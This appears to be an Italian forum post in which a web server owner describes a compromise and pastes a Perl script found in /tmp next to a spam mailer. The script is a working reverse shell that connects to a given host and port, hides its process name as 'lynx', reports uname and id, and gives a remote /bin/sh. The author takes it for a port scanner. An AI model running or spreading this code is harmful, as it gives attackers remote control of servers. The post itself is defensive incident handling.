Ciao bago,
grazie ancora per i tuoi suggerimenti,
infatti i 3 file creati avevamo come diritti apache.apache
Nella cartella tmp oltre alla lista delle email e lo script di invio email (fatto in perl) ho trovato questo script in perl che credo cerchi di effettuare qualche connessione, scansione di porte, ecc...
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Inoltre esaminando i log di apache ho notato che avevo lo stesso problema descritto in questo thread:
http://forum.ovh.it/showthread.php?t=317
e quindi ho creato lo script suggerito da torpado e l'ho messo, attraverso cron, in esecuzione ogni mezz'ora
Nelle prossime ore analizzerò se si verificherà ancora questo problema.
P.S.: ho letto l'email di spam e l'indirizzo mittente; l'email sembra in spagnolo/portoghese e l'email mittente è
jucargo@mail.com
Mi conviene fare una denuncia alla polizia contro ignoti? Che vantaggi otterrei considerando che in Italia questi argomenti sono poco conosciuti dalle forze dell'ordine?